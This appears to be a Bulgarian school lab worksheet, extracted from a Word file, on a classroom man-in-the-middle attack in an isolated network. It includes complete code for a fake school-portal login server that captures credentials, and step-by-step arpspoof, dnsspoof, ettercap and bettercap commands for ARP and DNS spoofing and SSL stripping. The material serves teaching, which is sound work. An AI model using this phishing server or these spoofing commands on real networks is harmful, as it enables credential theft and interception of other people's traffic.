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ЛАБОРАТОРНО УПРАЖНЕНИЕ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Man-in-the-Middle (MITM) Атака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Част 1: Теория, Архитектура и Изпълнение на Атаката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Предмет: Информационна сигурност | Клас: 11-12 | Продължителност: 3 учебни часа</w:t>
      </w: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6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ВАЖНО ПРЕДУПРЕЖДЕНИЕ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Това упражнение се провежда ЕДИНСТВЕНО в контролирана лабораторна среда, изолирана от интернет. Използването на тези техники извън лабораторни условия е НЕЗАКОННО (чл. 319а-319е НК).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Учебни цели и очаквани резултати</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1. Основни цели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Разбиране: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Учениците обясняват принципа на MITM атака и ролята на ARP протокола в нея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Приложение: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Конфигурират и изпълняват контролирана MITM атака в изолирана мрежа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Анализ: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Използват Wireshark за прихващане и анализ на мрежов трафик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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Идентифицират уязвимости и предлагат конкретни защитни мерки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.2. Необходими предварителни знания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Основи на TCP/IP и OSI моделите (Layer 2 и Layer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 адресиране, подмрежи, MAC адреси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ARP протокол (Address Resolution Protocol) — основно разбиране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 (Domain Name System) — как домейните се превръщат в IP адреси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Разлика между HTTP и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Основна работа с Linux Terminal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.3. Времево разпределение (3 учебни часа = 135 мин.)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Дейност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Материали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Теория: ARP, DNS, MITM принцип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Настройка на лабораторията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0:35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Демо: ARP Spoof + DNS Spoof + Фалшив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Прихващане с Wireshark (всички 4 фази)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1:30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Почивка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1:40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Защитни мерки (теория + практика)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2:05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Работен лист + Дискусия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2:15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Почистване и заключение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 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Архитектура на лабораторната среда</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1. Мрежова топология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Лабораторията използва изолирана LAN мрежа (192.168.100.0/24) без достъп до интернет и училищната мрежа. Всички устройства са свързани към отделен рутер, конфигуриран специално за упражнението.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pP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РУТЕР (Gateway)      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IP: 192.168.100.1            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SSID: CyberLab | WPA2        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DHCP: 192.168.100.50 - .100   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WAN: НЕ СВЪРЗВАН (изолация!) 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└─────┬───────────┬────────────┬─────────┘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│           │      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┌────┴────┐ ┌────┴─────┐ ┌────┴───────┐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│KALI      │ │EXPRESS    │ │УЧЕНИЦИ  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│LINUX     │ │СЪРВЪР    │ │(Жертви)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│.100.10   │ │.100.20    │ │.100.50-60   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│(Атакуващ)│ │(Фалш. сърв)│ │(3-10 устр.) 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└─────────┘ └──────────┘ └────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2. Необходимо оборудване и софтуер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Спецификация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Забележка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Рутер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WiFi рутер с DHCP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ОТДЕЛЕН от училищната мрежа!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Kali Linux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Лаптоп/VM с Kali 2024+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Вкл. arpspoof, ettercap, bettercap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 сървър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 + Express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Може на същата Kali машина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Wireshark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v4.0+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Kali + ученически машини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Учен. устройства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Лаптопи, телефони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3-10 устройства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2.3. Конфигурация на рутера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Влезте в админ панела на рутера (обикновено 192.168.0.1 или 192.168.1.1) и променете настройките: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Настройка         Стойност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─────────────────  ────────────────────────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 IP:          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Subnet Mask:      255.255.255.0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DHCP Start:       192.168.100.50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DHCP End:         192.168.100.100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SSID:             CyberLab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Security:         WPA2-PSK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WiFi Password:    CyberLab2024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WAN Port:         НИЩО не свързвайте!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DNS Server:       Не конфигурирайте (ще го spoof-нем)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6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КРИТИЧНО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НИКОГА не свързвайте WAN порта на лабораторния рутер към интернет или училищната мрежа. Това би превърнало упражнението в реална атака!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2.4. Статични IP адреси за атакуващите машини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Kali машината задайте статичен IP, за да не се променя по време на упражнението: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Метод 1: Чрез команден ред (временно)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ip addr flush dev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ip addr add 192.168.100.10/24 dev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ip route add default via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Метод 2: Чрез nmcli (постоянно)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modify CyberLab ipv4.addresses 192.168.100.10/24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modify CyberLab ipv4.gateway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modify CyberLab ipv4.method manual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nmcli con up CyberLab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addr show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Трябва да видите: inet 192.168.100.10/24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Ако Express сървърът е на отделна машина, направете същото с IP 192.168.100.20. Ако е на същата Kali машина, не е нужно — използвайте 192.168.100.10.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Теоретична основа: ARP протокол</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1. Как работи ARP (Address Resolution Protocol)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ARP свързва IP адреси с MAC адреси в локалната мрежа (Layer 2). Когато устройство A иска да комуникира с устройство B в LAN, то изпраща ARP Request broadcast пакет: "Кой има IP 192.168.100.1? Кажете на AA:BB:CC:DD:EE:50". Устройството с този IP отговаря с ARP Reply: "192.168.100.1 е на AA:BB:CC:DD:EE:01".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Проблемът: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ARP е stateless протокол БЕЗ никаква автентикация. Всяко устройство може да изпрати фалшив ARP Reply (т.н. unsolicited ARP Reply) и да каже: "192.168.100.1 е на [моя-фалшив-MAC]". Жертвата ще запише това в ARP таблицата си без проверка.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2. Как работи ARP Spoofing (MITM атака)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ARP Spoofing атакуващият изпраща фалшиви ARP Reply пакети на две страни одновременно:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pP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СТЪПКА 1: Атакуващият казва на ЖЕРТВАТА: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"Аз съм 192.168.100.1 (рутерът), MAC-ът ми е AA:BB:CC:DD:EE:10"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(Реално рутерът е AA:BB:CC:DD:EE:01)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СТЪПКА 2: Атакуващият казва на РУТЕРА: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"Аз съм 192.168.100.50 (жертвата), MAC-ът ми е AA:BB:CC:DD:EE:10"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(Реално жертвата е AA:BB:CC:DD:EE:50)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РЕЗУЛТАТ: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Жертва -&gt; [Атакуващ] -&gt; Рутер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Рутер -&gt; [Атакуващ] -&gt; Жертва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ВСИЧКИ пакети минават през атакуващия!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3. Какво е DNS Spoofing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DNS Spoofing допълва ARP Spoofing: когато жертвата поиска DNS разрешаване на portal.school.bg, атакуващият прихваща DNS заявката (защото трафикът вече минава през него) и отговаря с фалшиво IP — това на фалшивия логин сървър.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pP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Нормален DNS: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Жертва -&gt; DNS сървър: "Къде е portal.school.bg?"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DNS сървър -&gt; Жертва: "203.0.113.50" (реален IP)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DNS Spoofing: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Жертва -&gt; [Атакуващ]: "Къде е portal.school.bg?"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[Атакуващ] -&gt; Жертва: "192.168.100.20" (ФАЛШИВ IP!)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Жертвата отваря фалшивата страница!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Аналогия за учениците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Представете си, че изпращате писмо. Пощальонът (рутерът) знае къде живее всеки. ARP Spoofing е като някой да убеди пощальона, че ВИЕ сте получателят. Писмата идват при вас, вие ги четете и препращате, без никой да забележи.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Стъпка 1: Фалшива Login страница (Express.js)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1. Инсталиране на Node.js и Express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Инсталиране на Node.js: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update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nodejs npm -y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-v   # Трябва v18+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-v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Създай проектна папка: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mkdir ~/mitm-demo &amp;&amp; cd ~/mitm-demo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init -y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express</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2. Пълен код на fake_server.js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Създайте файл fake_server.js със следното съдържание. При POST заявка сървърът прихваща credentials и ги показва на екрана с предупреждение:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pP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fake_server.js - Учебен MITM демо сървър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express = require('express');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fs = require('fs');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app = express();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LOG_FILE = 'captured_credentials.json';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Парсване на POST form data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app.use(express.urlencoded({ extended: true }));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============================================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LOGIN СТРАНИЦА - имитира училищен портал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============================================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LOGIN_PAGE = `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&lt;!DOCTYPE html&gt;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&lt;html lang="bg"&gt;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&lt;head&gt;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&lt;meta charset="UTF-8"&gt;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&lt;meta name="viewport"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content="width=device-width,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initial-scale=1.0"&gt;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&lt;title&gt;School Portal - Вход&lt;/title&gt;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&lt;style&gt;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* { margin:0; padding:0;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box-sizing:border-box;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body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font-family: Arial, sans-serif;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background: #f0f2f5;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display: flex;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justify-content: center;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align-items: center;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min-height: 100vh;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.login-box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background: #fff;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padding: 40px;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border-radius: 8px;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box-shadow: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0 2px 10px rgba(0,0,0,0.1);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width: 400px;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.login-box h2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text-align: center;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color: #1a73e8;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margin-bottom: 30px;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.lock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text-align: center;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font-size: 48px;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margin-bottom: 10px;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input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width: 100%; padding: 12px;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margin: 8px 0;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border: 1px solid #ddd;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border-radius: 4px;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font-size: 14px;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input:focus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border-color: #1a73e8;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outline: none;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button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width: 100%; padding: 12px;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background: #1a73e8;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color: #fff; border: none;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border-radius: 4px;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font-size: 16px;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cursor: pointer;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margin-top: 16px;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button:hover { background: #1557b0;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.footer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text-align: center;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margin-top: 20px;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color: #666; font-size: 12px;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&lt;/style&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;div class="login-box"&gt;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&lt;div class="lock"&gt;&amp;#x1F512;&lt;/div&gt;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&lt;h2&gt;School Portal&lt;/h2&gt;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&lt;form method="POST" action="/login"&gt;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&lt;input name="username"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placeholder="Потребителско име"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required autocomplete="off"&gt;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&lt;input name="password" type="password"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placeholder="Парола" required&gt;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&lt;button type="submit"&gt;Вход&lt;/button&gt;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&lt;/form&gt;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&lt;div class="footer"&gt;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&amp;copy; 2024 School Portal v2.1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&lt;/div&gt;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&lt;/div&gt;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&lt;/body&gt;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&lt;/html&gt;`;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============================================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ROUTES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============================================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GET / - показва login страницата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app.get('/', (req, res) =&gt;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res.send(LOGIN_PAGE);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POST /login - прихваща credentials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app.post('/login', (req, res) =&gt;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{ username, password } = req.body;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ip = req.ip || req.socket.remoteAddress;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time = new Date().toLocaleString('bg-BG');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Лог в конзолата (видим на прожектора)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console.log('\n' + '='.repeat(50));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console.log('[!] CREDENTIALS CAPTURED!');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console.log(`    User: ${username}`);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console.log(`    Pass: ${password}`);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console.log(`    IP:   ${ip}`);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console.log(`    Time: ${time}`);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console.log('='.repeat(50) + '\n');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Запис във файл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entry = { username, password, ip, time };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 entries = [];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try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entries = JSON.parse(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fs.readFileSync(LOG_FILE, 'utf8')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catch {}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entries.push(entry);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fs.writeFileSync(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LOG_FILE,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JSON.stringify(entries, null, 2)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Показва предупреждение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res.send(`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&lt;!DOCTYPE html&gt;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&lt;html&gt;&lt;head&gt;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&lt;title&gt;Демо - MITM&lt;/title&gt;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&lt;/head&gt;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&lt;body style="font-family:Arial;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max-width:600px; margin:80px auto;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text-align:center;"&gt;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&lt;h1 style="color:#e74c3c;"&gt;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&amp;#x26A0;&amp;#xFE0F; Внимание!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&lt;/h1&gt;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&lt;h2&gt;Вашите данни бяха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прихванати!&lt;/h2&gt;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&lt;div style="background:#ffeaa7;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padding:20px; border-radius:8px;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margin:20px 0;"&gt;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&lt;p&gt;&lt;b&gt;Потребител:&lt;/b&gt;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${username}&lt;/p&gt;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&lt;p&gt;&lt;b&gt;Парола:&lt;/b&gt;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${password}&lt;/p&gt;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&lt;p&gt;&lt;b&gt;IP:&lt;/b&gt; ${ip}&lt;/p&gt;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&lt;p&gt;&lt;b&gt;Време:&lt;/b&gt; ${time}&lt;/p&gt;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&lt;/div&gt;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&lt;p&gt;Това е демонстрация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на MITM атака.&lt;/p&gt;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&lt;p&gt;&lt;b&gt;Никога&lt;/b&gt; не въвеждайте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данни в непознати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сайтове!&lt;/p&gt;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&lt;/body&gt;&lt;/html&gt;`);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============================================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СТАРТИРАНЕ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============================================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app.listen(80, '0.0.0.0', () =&gt;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console.log('[*] Фалшив Login сървър');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console.log('[*] http://0.0.0.0:80');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</w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3. Стартиране и тестване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Порт 80 изисква root права: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node fake_server.js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Тест от друга машина в мрежата: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http://192.168.100.10/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Трябва да видите HTML на login страницата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Тест POST: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http://192.168.100.10/login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'username=test&amp;password=test123'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Трябва да видите предупредителна страница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Съвет за преподавателя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Покажете терминала на прожектора! Когато ученик попълни формата с тестови данни (user1/pass1), прихванатите credentials ще се появят в реално време в конзолата. Това е мощен визуален момент!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Стъпка 2: ARP Spoofing и DNS Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1. Подготовка на Kali машината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Преди да стартирате атаката, трябва да включите IP forwarding. Без това пакетите ще стигат до атакуващия, но няма да бъдат препратени — жертвата ще загуби връзка и ще забележи проблем.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Включи IP forwarding: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1 | sudo tee /proc/sys/net/ipv4/ip_forward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Проверка (трябва да изведе "1"):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/proc/sys/net/ipv4/ip_forward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Инсталирай инструментите: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update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dsniff ettercap-text-only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bettercap wireshark -y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2. МЕТОД 1: arpspoof + dnsspoof (класически)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Този метод използва отделни инструменти за всяка стъпка. Отворете 4 отделни терминала на Kali машината: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Терминал 1 — ARP Spoof към жертвата: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Казваме на жертвата (192.168.100.50), че НИЕ сме gateway (192.168.100.1):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arpspoof -i wlan0 -t 192.168.100.50 192.168.100.1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-i wlan0         = мрежов интерфейс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-t 192.168.100.50 = IP на жертвата (target)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192.168.100.1     = IP който имитираме (gateway)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Ще видите повтарящи се редове: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aa:bb:cc:dd:ee:10 aa:bb:cc:dd:ee:50 0806 42: ...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Терминал 2 — ARP Spoof към рутера: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Казваме на рутера, че НИЕ сме жертвата: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arpspoof -i wlan0 -t 192.168.100.1 192.168.100.50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Терминал 3 — DNS Spoofing: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Създаваме файл с DNS записи, който пренасочва portal.school.bg към фалшивия сървър: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Създай DNS spoof файл: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&lt;&lt; EOF | sudo tee /tmp/dns_hosts.txt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192.168.100.10  portal.school.bg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192.168.100.10  *.school.bg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EOF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Стартирай DNS spoofing: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dnsspoof -i wlan0 -f /tmp/dns_hosts.txt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Когато жертвата поиска portal.school.bg,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ще получи IP 192.168.100.10 (нашият Express сървър)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Терминал 4 — Мониторинг (по избор):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Следи HTTP URL-ите в реално време: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urlsnarf -i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Или визуализирай изображения от трафика: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driftnet -i wlan0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3. МЕТОД 2: Ettercap (all-in-one)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Ettercap комбинира ARP и DNS spoofing в един инструмент. По-лесен за управление, но по-малко прозрачен за учебни цели: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Конфигурирай DNS spoofing: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nano /etc/ettercap/etter.dns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Добави тези редове в края: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portal.school.bg    A   192.168.100.10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*.school.bg          A   192.168.100.10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Стартирай Ettercap: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ettercap -T -q -i wlan0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-M arp:remote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-P dns_spoof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/192.168.100.1// /192.168.100.50//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Параметри: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-T              = текстов режим (без GUI)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-q              = тих режим (по-малко output)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-M arp:remote    = ARP MITM атака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-P dns_spoof     = DNS spoofing плъгин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/192.168.100.1// = Цел 1 (рутер)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/192.168.100.50//= Цел 2 (жертва)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4. МЕТОД 3: Bettercap (модерен, препоръчителен)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Bettercap е най-модерният инструмент. Има интерактивна конзола, която позволява стъпка по стъпка изпълнение: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Стартирай bettercap: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bettercap -iface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=== В bettercap конзолата: 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Сканирай мрежата (намери устройствата)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net.probe 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Покажи намерените устройства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net.show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Конфигурирай ARP spoofing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arp.spoof.fullduplex true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arp.spoof.targets 192.168.100.50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4. Стартирай ARP spoofing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arp.spoof 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5. Конфигурирай DNS spoofing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dns.spoof.domains portal.school.bg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dns.spoof.address 192.168.100.10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6. Стартирай DNS spoofing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dns.spoof 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7. Включи мрежов sniffer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net.sniff.verbose true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net.sniff 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8. (Опционално) HTTP proxy + SSL strip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http.proxy.sslstrip true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http.proxy on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Статус на всички модули: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help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🎯 Препоръка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 демонстрация пред класа препоръчвам Bettercap — интерактивната конзола позволява да обяснявате всяка стъпка поотделно. За упражнение на учениците — Метод 1 (arpspoof + dnsspoof), защото показва отделно всеки компонент на атаката.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5.5. Проверка че атаката работи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устройството на жертвата (192.168.100.50):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Провери ARP таблицата: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arp -a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Трябва да видите че MAC-ът на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е променен (съвпада с MAC на атакуващия)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Отвори браузър и отиди на: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http://portal.school.bg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Трябва да видите фалшивата login страница!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Въведете ТЕСТОВИ данни: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Username: user1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Password: pass1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След submit ще видите предупреждението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6"/>
              <w:left w:val="none" w:sz="0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⚠ САМО тестови данни!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НИКОГА не използвайте реални пароли! Използвайте само тестови данни като user1/pass1, test/test123 и т.н.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MITM Лаб | Част 1: Теория и Атака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2026-02-16T06:39:11.936Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-16T06:39:11.937Z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